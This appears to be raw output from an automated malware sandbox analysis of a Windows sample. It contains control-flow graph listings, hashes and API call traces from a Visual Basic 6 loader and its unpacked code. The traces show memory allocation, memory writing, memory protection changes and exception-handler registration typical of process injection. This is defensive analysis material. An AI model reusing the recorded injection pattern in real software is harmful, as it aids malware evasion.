1376 232374d-2323755 1361->1376 1373 2321a7f-2321a96 1364->1373 1374 2321c2d-2321c44 1364->1374 1365->1364 1366->1338 1372 232224a-232227e 1366->1372 1369->1370 1383 23220a7-23220e0 1371->1383 1384 2321fd7-2321ff1 1371->1384 1372->1338 1385 2322284-23222f0 1372->1385 1373->1374 1386 2321a9c-2321b0e 1373->1386 1381 2321d64-2321da8 1374->1381 1382 2321c4a-2321cd0 1374->1382 1427 231aacd-231afd9 call 231f3ee call 2322acd call 231bd4b call 231f313 call 2322acd 1375->1427 1428 231bbfe-231bd48 call 2322acd * 3 1375->1428 1390 2323756-232378f 1376->1390 1381->1342 1395 2321dae-2321dec call 23223e2 1381->1395 1382->1381 1402 2321cd6-2321d61 1382->1402 1383->1371 1399 23220e6-232216c call 23223e2 1383->1399 1393 2321ff3-232200a 1384->1393 1394 232201c-2322084 1384->1394 1406 23222f5-232230e 1385->1406 1407 2321b0f-2321b3f 1386->1407 1390->1390 1401 2323791-23237e0 1390->1401 1393->1360 1403 2322010-232201a 1393->1403 1394->1383 1395->1292 1402->1381 1403->1394 1413 2322088-23220a6 1403->1413 1414 2322310-232237a 1406->1414 1415 232237b-23223ae 1406->1415 1407->1407 1416 2321b41-2321bdb 1407->1416 1413->1383 1414->1415 1415->1406 1421 23223b4 1415->1421 1416->1407 1426 2321be1-2321c20 1416->1426 1421->1343 1426->1407 1431 2321c26-2321c2a 1426->1431 1427->1428 1456 231afdf-231b089 1427->1456 1428->1352 1431->1374 1456->1352 1458 231b08f-231b1e5 call 2322acd 1456->1458 1458->1360 1463 231b1eb-231b20b 1458->1463 1463->1428 1464 231b211-231b3f2 call 231b2fb 1463->1464 1464->1245 1470 231b3f8-231b554 call 2322acd 1464->1470 1470->1428 1475 231b55a-231b597 1470->1475 1475->1428 1476 231b59d-231b604 1475->1476 1478 231b641-231b64a 1476->1478 1479 231b606-231b63b 1476->1479 1478->1305 1480 231b650-231b66e 1478->1480 1479->1428 1479->1478 1480->1428 1481 231b674-231b68f 1480->1481 1481->1305 1482 231b695-231b8b7 call 231f944 1481->1482 1482->1428 1488 231b8bd-231b9ea call 232374d NtWriteVirtualMemory 1482->1488 1488->1428 1493 231b9f0-231baba call 2322acd 1488->1493 1493->1428 1497 231bac0-231bb82 call 2322acd 1493->1497 1497->1428 1501 231bb84-231bbde 1497->1501 1501->1376 1503 231bbe4-231bbfd call 2322acd 1501->1503
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.47312005259.0000000002310000.00000040.00000001.sdmp, Offset: 02310000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_2310000_Zr26f1rL6r.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: );J$EK]
                                                                                                                          • API String ID: 0-1158390361
                                                                                                                          • Opcode ID: a4b92d3d0d7d265f08df846bb82963276782873b54e4a78cca23913e034de93d
                                                                                                                          • Instruction ID: 536e1ae772702ae8bacbfb3c363d369544bc7775434566ecb4e4baec9f49ac40
                                                                                                                          • Opcode Fuzzy Hash: a4b92d3d0d7d265f08df846bb82963276782873b54e4a78cca23913e034de93d
                                                                                                                          • Instruction Fuzzy Hash: 4EB17930A04359CFDF38AE34CDA43EA37A2EF55350F49452ACC8A8F655D735998ACB42
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1506 231c88b-231c8a0 1507 231c8a6-231c954 1506->1507 1508 231cbe8-231cd65 call 231f32f call 231cc7e 1506->1508 1511 231c95a-231ca12 call 231f3ee 1507->1511 1512 231f3ee-231f4b1 1507->1512 1508->1512 1527 231a574-231a80f call 2321490 call 231a760 1511->1527 1528 231ca18-231cae3 call 231ca93 1511->1528 1519 231f4b3-231f4e1 call 231fcc1 call 231f542 1512->1519 1520 231f4e4-231f4e9 LoadLibraryA 1512->1520 1519->1520 1524 231f533-231f53d call 231f542 1520->1524 1527->1512 1548 231a815-231a841 1527->1548 1528->1527 1542 231cae9-231cb18 1528->1542 1542->1527 1544 231cb1e-231cbe6 NtAllocateVirtualMemory 1542->1544 1544->1508 1549 2311320-231136d call 23110c0 1548->1549 1550 231a847-231a8fa 1548->1550 1553 231a900-231aac7 call 231f3ca call 2322acd 1550->1553 1554 232374d-2323755 1550->1554 1566 231aacd-231afd9 call 231f3ee call 2322acd call 231bd4b call 231f313 call 2322acd 1553->1566 1567 231bbfe-231bd48 call 2322acd * 3 1553->1567 1558 2323756-232378f 1554->1558 1558->1558 1560 2323791-23237e0 1558->1560 1566->1567 1594 231afdf-231b089 1566->1594 1567->1512 1594->1512 1596 231b08f-231b1e5 call 2322acd 1594->1596 1596->1549 1601 231b1eb-231b20b 1596->1601 1601->1567 1602 231b211-231b3f2 call 231b2fb 1601->1602 1608 231b3f8-231b554 call 2322acd 1602->1608 1609 231138e-2311464 call 23237e8 1602->1609 1608->1567 1620 231b55a-231b597 1608->1620 1618 2311466-2322adc 1609->1618 1619 23114dd-2311502 1609->1619 1625 2322add-2322b37 1618->1625 1622 2311572-2311578 1619->1622 1623 2311517-2311518 1619->1623 1620->1567 1624 231b59d-231b604 1620->1624 1626 2311579-2311594 1622->1626 1623->1622 1630 231b641-231b64a 1624->1630 1631 231b606-231b63b 1624->1631 1625->1609 1632 2322b3d-2322d65 1625->1632 1626->1623 1629 2311596-23115a6 1626->1629 1633 23115b6-23115b9 1629->1633 1634 23115a9-23115b4 1629->1634 1630->1527 1635 231b650-231b66e 1630->1635 1631->1567 1631->1630 1632->1625 1657 2322d6b-2322de9 call 23206a2 1632->1657 1633->1626 1637 23115bb-23215f9 call 231f3ee * 2 call 23237e8 GetPEB call 23223e2 1633->1637 1634->1633 1635->1567 1638 231b674-231b68f 1635->1638 1675 2321df1-2321e3a 1637->1675 1676 23215ff-23216a1 1637->1676 1638->1527 1640 231b695-231b8b7 call 231f944 1638->1640 1640->1567 1656 231b8bd-231b99b call 232374d NtWriteVirtualMemory 1640->1656 1670 231b9e1-231b9ea 1656->1670 1668 2322dec-2322dff 1657->1668 1668->1668 1671 2322e01-2322e89 1668->1671 1670->1567 1673 231b9f0-231baba call 2322acd 1670->1673 1678 2322e8c-2322f06 1671->1678 1673->1567 1687 231bac0-231bb82 call 2322acd 1673->1687 1676->1609 1683 23216a7-2321838 1676->1683 1685 2322f08-2322fe7 call 232322b 1678->1685 1695 232183c-232184d 1683->1695 1705 23231cc-2323231 1685->1705 1706 2322fed-2323091 1685->1706 1687->1567 1699 231bb84-231bbde 1687->1699 1697 2321853-2321863 1695->1697 1698 2321e40-2321e54 1695->1698 1697->1695 1702 2321865-2321892 1697->1702 1701 2321e58-2321e6d 1698->1701 1699->1554 1704 231bbe4-231bbfd call 2322acd 1699->1704 1707 2322172-2322187 1701->1707 1708 2321e73-2321eac 1701->1708 1702->1695 1709 2321894-23218aa 1702->1709 1705->1527 1730 2323237-2323269 1705->1730 1706->1705 1719 2323097-23230ad 1706->1719 1707->1609 1710 232218d-232218e 1707->1710 1708->1701 1714 2321eae-2321ec5 1708->1714 1709->1695 1715 23218ac-2321920 1709->1715 1717 2322192-23221a1 1710->1717 1714->1701 1720 2321ec7-2321f29 1714->1720 1721 2321922-232199c 1715->1721 1722 23223b6-23223dd call 23223e2 1717->1722 1723 23221a7-2322219 1717->1723 1719->1705 1725 23230b3-23230ca 1719->1725 1720->1701 1727 2321f2f-2321f46 1720->1727 1736 23219a2-23219e7 1721->1736 1737 2321a39-2321a4c 1721->1737 1723->1609 1738 232221f-232222a 1723->1738 1725->1705 1732 23230d0-2323102 1725->1732 1727->1609 1735 2321f4c-2321fb8 1727->1735 1730->1705 1739 232326f-23232f4 1730->1739 1732->1705 1740 2323108-2323161 1732->1740 1747 2321fbd-2321fd1 1735->1747 1742 2321a69-2321a79 1736->1742 1737->1742 1743 2321a4e-2321a68 1737->1743 1738->1717 1744 2322230-2322244 1738->1744 1739->1705 1751 23232fa-232332c 1739->1751 1740->1705 1754 2323163-232317d 1740->1754 1749 2321a7f-2321a96 1742->1749 1750 2321c2d-2321c44 1742->1750 1743->1742 1744->1717 1748 232224a-232227e 1744->1748 1755 23220a7-23220e0 1747->1755 1756 2321fd7-2321ff1 1747->1756 1748->1717 1757 2322284-23222f0 1748->1757 1749->1750 1758 2321a9c-2321b0e 1749->1758 1752 2321d64-2321da8 1750->1752 1753 2321c4a-2321cd0 1750->1753 1751->1705 1759 2323332-2323335 1751->1759 1752->1721 1764 2321dae-2321dec call 23223e2 1752->1764 1753->1752 1768 2321cd6-2321d61 1753->1768 1754->1705 1761 232317f-23231ab call 232322b RtlAddVectoredExceptionHandler 1754->1761 1755->1747 1767 23220e6-232216c call 23223e2 1755->1767 1762 2321ff3-232200a 1756->1762 1763 232201c-2322084 1756->1763 1773 23222f5-232230e 1757->1773 1774 2321b0f-2321b3f 1758->1774 1783 23231b0-23231b8 1761->1783 1762->1549 1770 2322010-232201a 1762->1770 1763->1755 1764->1675 1768->1752 1770->1763 1778 2322088-23220a6 1770->1778 1779 2322310-232237a 1773->1779 1780 232237b-23223ae 1773->1780 1774->1774 1781 2321b41-2321bdb 1774->1781 1778->1755 1779->1780 1780->1773 1786 23223b4 1780->1786 1781->1774 1790 2321be1-2321c20 1781->1790 1783->1783 1788 23231ba-23231c6 1783->1788 1786->1722 1788->1705 1790->1774 1791 2321c26-2321c2a 1790->1791 1791->1750
                                                                                                                          APIs
                                                                                                                          • NtAllocateVirtualMemory.NTDLL(8D05082D,?,-00000001EF38FF1E), ref: 0231CBC8
                                                                                                                          • LoadLibraryA.KERNELBASE(?,?,?,4A82DAC6,023104DF,16EF18E8,0231E3FE,00000000,0231042E), ref: 0231F4E6
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.47312005259.0000000002310000.00000040.00000001.sdmp, Offset: 02310000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_2310000_Zr26f1rL6r.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocateLibraryLoadMemoryVirtual
                                                                                                                          • String ID: U=b
                                                                                                                          • API String ID: 2616484454-117013522
                                                                                                                          • Opcode ID: c3e6492804730bdffc58052f636a2bff474bc7b25ae8e1f45e2bd308a4fdb406
                                                                                                                          • Instruction ID: 3749e4aad45e1084f6d8707bf450460831abfbbcadaf5b0e243297d2dfb141d4
                                                                                                                          • Opcode Fuzzy Hash: c3e6492804730bdffc58052f636a2bff474bc7b25ae8e1f45e2bd308a4fdb406
                                                                                                                          • Instruction Fuzzy Hash: 31817DB1A0035ADFCF389E689DA43EA36B7EF95390F94013ADC499B255D7318A42CB11
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1792 2321161-232117b 1793 2321181-23211be 1792->1793 1793->1793 1794 23211c0-2321213 1793->1794 1796 2321219-2321275 1794->1796 1797 231138e-2311464 call 23237e8 1794->1797 1796->1797 1801 232127b-23212ad 1796->1801 1806 2311466-2322adc 1797->1806 1807 23114dd-2311502 1797->1807 1803 23212b3-2321330 1801->1803 1804 231f3ee-231f4b1 1801->1804 1813 231f4b3-231f4e1 call 231fcc1 call 231f542 1804->1813 1814 231f4e4-231f53d LoadLibraryA call 231f542 1804->1814 1815 2322add-2322b37 1806->1815 1811 2311572-2311578 1807->1811 1812 2311517-2311518 1807->1812 1816 2311579-2311594 1811->1816 1812->1811 1813->1814 1815->1797 1825 2322b3d-2322d65 1815->1825 1816->1812 1822 2311596-23115a6 1816->1822 1826 23115b6-23115b9 1822->1826 1827 23115a9-23115b4 1822->1827 1825->1815 1843 2322d6b-2322de9 call 23206a2 1825->1843 1826->1816 1830 23115bb-23215f9 call 231f3ee * 2 call 23237e8 GetPEB call 23223e2 1826->1830 1827->1826 1856 2321df1-2321e3a 1830->1856 1857 23215ff-23216a1 1830->1857 1851 2322dec-2322dff 1843->1851 1851->1851 1853 2322e01-2322e89 1851->1853 1858 2322e8c-2322f06 1853->1858 1857->1797 1862 23216a7-2321838 1857->1862 1863 2322f08-2322fe7 call 232322b 1858->1863 1870 232183c-232184d 1862->1870 1876 23231cc-2323231 1863->1876 1877 2322fed-2323091 1863->1877 1871 2321853-2321863 1870->1871 1872 2321e40-2321e54 1870->1872 1871->1870 1875 2321865-2321892 1871->1875 1874 2321e58-2321e6d 1872->1874 1878 2322172-2322187 1874->1878 1879 2321e73-2321eac 1874->1879 1875->1870 1880 2321894-23218aa 1875->1880 1899 231a574-231a80f call 2321490 call 231a760 1876->1899 1900 2323237-2323269 1876->1900 1877->1876 1888 2323097-23230ad 1877->1888 1878->1797 1881 232218d-232218e 1878->1881 1879->1874 1884 2321eae-2321ec5 1879->1884 1880->1870 1885 23218ac-2321920 1880->1885 1887 2322192-23221a1 1881->1887 1884->1874 1889 2321ec7-2321f29 1884->1889 1890 2321922-232199c 1885->1890 1891 23223b6-23223dd call 23223e2 1887->1891 1892 23221a7-2322219 1887->1892 1888->1876 1894 23230b3-23230ca 1888->1894 1889->1874 1896 2321f2f-2321f46 1889->1896 1906 23219a2-23219e7 1890->1906 1907 2321a39-2321a4c 1890->1907 1892->1797 1908 232221f-232222a 1892->1908 1894->1876 1902 23230d0-2323102 1894->1902 1896->1797 1905 2321f4c-2321fb8 1896->1905 1899->1804 1969 231a815-231a841 1899->1969 1900->1876 1909 232326f-23232f4 1900->1909 1902->1876 1911 2323108-2323161 1902->1911 1919 2321fbd-2321fd1 1905->1919 1913 2321a69-2321a79 1906->1913 1907->1913 1914 2321a4e-2321a68 1907->1914 1908->1887 1915 2322230-2322244 1908->1915 1909->1876 1923 23232fa-232332c 1909->1923 1911->1876 1928 2323163-232317d 1911->1928 1921 2321a7f-2321a96 1913->1921 1922 2321c2d-2321c44 1913->1922 1914->1913 1915->1887 1920 232224a-232227e 1915->1920 1929 23220a7-23220e0 1919->1929 1930 2321fd7-2321ff1 1919->1930 1920->1887 1931 2322284-23222f0 1920->1931 1921->1922 1932 2321a9c-2321b0e 1921->1932 1926 2321d64-2321da8 1922->1926 1927 2321c4a-2321cd0 1922->1927 1923->1876 1933 2323332-2323335 1923->1933 1926->1890 1939 2321dae-2321dec call 23223e2 1926->1939 1927->1926 1944 2321cd6-2321d61 1927->1944 1928->1876 1936 232317f-23231ab call 232322b RtlAddVectoredExceptionHandler 1928->1936 1929->1919 1942 23220e6-232216c call 23223e2 1929->1942 1937 2321ff3-232200a 1930->1937 1938 232201c-2322084 1930->1938 1950 23222f5-232230e 1931->1950 1951 2321b0f-2321b3f 1932->1951 1963 23231b0-23231b8 1936->1963 1946 2311320-231136d call 23110c0 1937->1946 1947 2322010-232201a 1937->1947 1938->1929 1939->1856 1944->1926 1947->1938 1956 2322088-23220a6 1947->1956 1958 2322310-232237a 1950->1958 1959 232237b-23223ae 1950->1959 1951->1951 1960 2321b41-2321bdb 1951->1960 1956->1929 1958->1959 1959->1950 1967 23223b4 1959->1967 1960->1951 1974 2321be1-2321c20 1960->1974 1963->1963 1970 23231ba-23231c6 1963->1970 1967->1891 1969->1946 1973 231a847-231a8fa 1969->1973 1970->1876 1977 231a900-231aac7 call 231f3ca call 2322acd 1973->1977 1978 232374d-2323755 1973->1978 1974->1951 1976 2321c26-2321c2a 1974->1976 1976->1922 1988 231aacd-231afd9 call 231f3ee call 2322acd call 231bd4b call 231f313 call 2322acd 1977->1988 1989 231bbfe-231bd48 call 2322acd * 3 1977->1989 1980 2323756-232378f 1978->1980 1980->1980 1982 2323791-23237e0 1980->1982 1988->1989 2016 231afdf-231b089 1988->2016 1989->1804 2016->1804 2018 231b08f-231b1e5 call 2322acd 2016->2018 2018->1946 2023 231b1eb-231b20b 2018->2023 2023->1989 2024 231b211-231b3f2 call 231b2fb 2023->2024 2024->1797 2030 231b3f8-231b554 call 2322acd 2024->2030 2030->1989 2035 231b55a-231b597 2030->2035 2035->1989 2036 231b59d-231b604 2035->2036 2038 231b641-231b64a 2036->2038 2039 231b606-231b63b 2036->2039 2038->1899 2040 231b650-231b66e 2038->2040 2039->1989 2039->2038 2040->1989 2041 231b674-231b68f 2040->2041 2041->1899 2042 231b695-231b8b7 call 231f944 2041->2042 2042->1989 2048 231b8bd-231b9ea call 232374d NtWriteVirtualMemory 2042->2048 2048->1989 2053 231b9f0-231baba call 2322acd 2048->2053 2053->1989 2057 231bac0-231bb82 call 2322acd 2053->2057 2057->1989 2061 231bb84-231bbde 2057->2061 2061->1978 2063 231bbe4-231bbfd call 2322acd 2061->2063
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.47312005259.0000000002310000.00000040.00000001.sdmp, Offset: 02310000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_2310000_Zr26f1rL6r.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: EK]
                                                                                                                          • API String ID: 0-1532622298
                                                                                                                          • Opcode ID: a0cba0a81fb308cf4c3a5c258c041078d070c32af104d5bf65bead1deba37b65
                                                                                                                          • Instruction ID: 26cb6b27af9464621b3e3c2220562441ff10510a1298e7dc819e4c332ced95f1
                                                                                                                          • Opcode Fuzzy Hash: a0cba0a81fb308cf4c3a5c258c041078d070c32af104d5bf65bead1deba37b65
                                                                                                                          • Instruction Fuzzy Hash: 0961DC716003499FDF399E748AA43DB37AAEF963A0F55041ECC8ACBA01D731C986CB01
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 2066 231ffed-231fff4 call 2320391 2069 231fffa-232008e 2066->2069 2071 2320090-232013c call 23202dc 2069->2071 2075 232013e-232014a 2071->2075 2076 232014c-23201d8 2071->2076 2075->2076 2076->2071 2078 23201de-23201ea 2076->2078 2078->2069 2079 23201f0-2320231 2078->2079 2080 2320237-2320243 2079->2080 2081 231f3ee-231f4b1 2079->2081 2080->2069 2083 2320249-2320280 2080->2083 2084 231f4b3-231f4e1 call 231fcc1 call 231f542 2081->2084 2085 231f4e4-231f53d LoadLibraryA call 231f542 2081->2085 2083->2069 2086 2320286-23202d8 2083->2086 2084->2085
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.47312005259.0000000002310000.00000040.00000001.sdmp, Offset: 02310000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_2310000_Zr26f1rL6r.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: `
                                                                                                                          • API String ID: 0-1850852036
                                                                                                                          • Opcode ID: 021217d6e82f315ae35b3563ff0eb4a17839efee1226da9567c98cd0f92d8134
                                                                                                                          • Instruction ID: d99cbd83723daf9f3c4adf44e598e6c7e5979a22b35a0e593540556d927706d7
                                                                                                                          • Opcode Fuzzy Hash: 021217d6e82f315ae35b3563ff0eb4a17839efee1226da9567c98cd0f92d8134
                                                                                                                          • Instruction Fuzzy Hash: 0B518F7660076ACFDF385E294E683DA33A7EFB13A0FDA402ACC4957601D775494ACB41
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 2215 23223e2-23224f9 NtProtectVirtualMemory
                                                                                                                          APIs
                                                                                                                          • NtProtectVirtualMemory.NTDLL(-11417B1E,?,?,?,?,023215C1,12BC0BD0,0231A728), ref: 023224F5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.47312005259.0000000002310000.00000040.00000001.sdmp, Offset: 02310000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_2310000_Zr26f1rL6r.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: MemoryProtectVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2706961497-0
                                                                                                                          • Opcode ID: 1670dfe0295b295c956e32a55cfa435958ec75999ae85247dfb3362f5119314a
                                                                                                                          • Instruction ID: 1bb8b46ccdc0643b448b912d708b219767603af407ae12aeee348716eb04518f
                                                                                                                          • Opcode Fuzzy Hash: 1670dfe0295b295c956e32a55cfa435958ec75999ae85247dfb3362f5119314a
                                                                                                                          • Instruction Fuzzy Hash: 81017CB46043A98FDF30CE68C8D87DA7695FB9D700F81412AAD4DAB305C6715E8ACB61
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.47312005259.0000000002310000.00000040.00000001.sdmp, Offset: 02310000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_2310000_Zr26f1rL6r.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 263823a9383cfc15d3ea323d198b1a46e41557d48698b523c2a2fe07229f2b2b
                                                                                                                          • Instruction ID: 19c2f48ecc2611bf57b9894da1fec6a65550607af3a81a5c3df7dc3e6da1cd25
                                                                                                                          • Opcode Fuzzy Hash: 263823a9383cfc15d3ea323d198b1a46e41557d48698b523c2a2fe07229f2b2b
                                                                                                                          • Instruction Fuzzy Hash: 37415B32108595CFD72ECF3CC8852D77BA1EF56238B182B9EC9A98B493C3289017CB51
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          • #574.MSVBVM60(?), ref: 0041E8FB
                                                                                                                          • __vbaStrMove.MSVBVM60 ref: 0041E906
                                                                                                                          • __vbaStrCmp.MSVBVM60(00403564,00000000), ref: 0041E912
                                                                                                                          • __vbaFreeStr.MSVBVM60 ref: 0041E925
                                                                                                                          • __vbaFreeVar.MSVBVM60 ref: 0041E934
                                                                                                                          • #613.MSVBVM60(?,00000002), ref: 0041E952
                                                                                                                          • __vbaStrVarMove.MSVBVM60(?), ref: 0041E962
                                                                                                                          • __vbaStrMove.MSVBVM60 ref: 0041E969
                                                                                                                          • __vbaFreeVarList.MSVBVM60(00000002,00000002,?), ref: 0041E979
                                                                                                                          • #612.MSVBVM60(00000002), ref: 0041E986
                                                                                                                          • __vbaStrVarMove.MSVBVM60(00000002), ref: 0041E990
                                                                                                                          • __vbaStrMove.MSVBVM60 ref: 0041E997
                                                                                                                          • __vbaFreeVar.MSVBVM60 ref: 0041E9A0
                                                                                                                          • __vbaNew2.MSVBVM60(00403940,00420010), ref: 0041E9B5
                                                                                                                          • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041E9CE
                                                                                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004034F8,00000130), ref: 0041E9F5
                                                                                                                          • #690.MSVBVM60(UNIGNORANTLY,Layoutet9,sportsheltes,?), ref: 0041EA0E
                                                                                                                          • __vbaFreeStr.MSVBVM60 ref: 0041EA17
                                                                                                                          • __vbaFreeObj.MSVBVM60 ref: 0041EA20
                                                                                                                          • __vbaNew2.MSVBVM60(00403940,00420010), ref: 0041EA39
                                                                                                                          • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041EA52
                                                                                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004035C4,000000A8), ref: 0041EA79
                                                                                                                          • __vbaFileOpen.MSVBVM60(00000020,000000FF,000000AB,?), ref: 0041EA8C
                                                                                                                          • __vbaFreeStr.MSVBVM60 ref: 0041EA95
                                                                                                                          • __vbaFreeObj.MSVBVM60 ref: 0041EA9E
                                                                                                                          • #692.MSVBVM60(00000002,Untaunting,Fakkels), ref: 0041EAB2
                                                                                                                          • __vbaVarTstNe.MSVBVM60(?,00000002), ref: 0041EACA
                                                                                                                          • __vbaFreeVar.MSVBVM60 ref: 0041EAD6
                                                                                                                          • #536.MSVBVM60(00000002), ref: 0041EAF0
                                                                                                                          • __vbaStrMove.MSVBVM60 ref: 0041EAFB
                                                                                                                          • __vbaFreeVar.MSVBVM60 ref: 0041EB04
                                                                                                                          • __vbaNew2.MSVBVM60(00403488,004204D8), ref: 0041EB18
                                                                                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,0234EA7C,00403478,00000014), ref: 0041EB43
                                                                                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403498,00000130), ref: 0041EB71
                                                                                                                          • __vbaStrMove.MSVBVM60 ref: 0041EB7C
                                                                                                                          • __vbaFreeObj.MSVBVM60 ref: 0041EB85
                                                                                                                          • __vbaNew2.MSVBVM60(00403488,004204D8), ref: 0041EB9D
                                                                                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,0234EA7C,00403478,00000014), ref: 0041EBC2
                                                                                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403498,000000F0), ref: 0041EBE8
                                                                                                                          • __vbaStrMove.MSVBVM60 ref: 0041EBF3
                                                                                                                          • __vbaFreeObj.MSVBVM60 ref: 0041EBFC
                                                                                                                          • __vbaNew2.MSVBVM60(00403940,00420010), ref: 0041EC15
                                                                                                                          • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041EC2E
                                                                                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004034E8,00000108), ref: 0041EC55
                                                                                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402E04,0000015C), ref: 0041EC79
                                                                                                                          • __vbaFreeObj.MSVBVM60 ref: 0041EC7E
                                                                                                                          • __vbaFreeStr.MSVBVM60(0041ECDF), ref: 0041ECC8
                                                                                                                          • __vbaFreeStr.MSVBVM60 ref: 0041ECCD
                                                                                                                          • __vbaFreeStr.MSVBVM60 ref: 0041ECD2
                                                                                                                          • __vbaFreeStr.MSVBVM60 ref: 0041ECD7
                                                                                                                          • __vbaFreeStr.MSVBVM60 ref: 0041ECDC
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.47310862985.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.47310843756.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.47311008132.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.47311035451.0000000000422000.00000002.00020000.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Zr26f1rL6r.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: __vba$Free$CheckHresultMove$New2$#536#574#612#613#690#692FileListOpen
                                                                                                                          • String ID: Fakkels$Layoutet9$UNIGNORANTLY$Untaunting$sportsheltes
                                                                                                                          • API String ID: 1405222031-2842152946
                                                                                                                          • Opcode ID: 410be91c31f27679d8d3c6b6c3d9263006ca6c134554781323ce623a53d21b29
                                                                                                                          • Instruction ID: 9397be05867e9acc0c7cc8e09b162062c1115f94f3f82311650de7be55ba3f8b
                                                                                                                          • Opcode Fuzzy Hash: 410be91c31f27679d8d3c6b6c3d9263006ca6c134554781323ce623a53d21b29
                                                                                                                          • Instruction Fuzzy Hash: 76C16175940218AFCB14DFA1ED49EDDBBB8FF58701F20402AF542B72A0DA746A45CB68
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          • __vbaVarDup.MSVBVM60 ref: 0041EE4D
                                                                                                                          • #645.MSVBVM60(?,00000000), ref: 0041EE58
                                                                                                                          • __vbaStrMove.MSVBVM60 ref: 0041EE63
                                                                                                                          • __vbaFreeVar.MSVBVM60 ref: 0041EE6C
                                                                                                                          • __vbaNew2.MSVBVM60(00403940,00420010), ref: 0041EE85
                                                                                                                          • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041EEA4
                                                                                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004034E8,00000220), ref: 0041EEE9
                                                                                                                          • __vbaFreeObj.MSVBVM60 ref: 0041EEF8
                                                                                                                          • __vbaNew2.MSVBVM60(00403940,00420010), ref: 0041EF0D
                                                                                                                          • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041EF26
                                                                                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004034E8,00000168), ref: 0041EF49
                                                                                                                          • __vbaFreeObj.MSVBVM60 ref: 0041EF58
                                                                                                                          • __vbaFreeStr.MSVBVM60(0041EF7E), ref: 0041EF77
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.47310862985.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.47310843756.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.47311008132.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.47311035451.0000000000422000.00000002.00020000.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Zr26f1rL6r.jbxd
                                                                                                                          Similarity
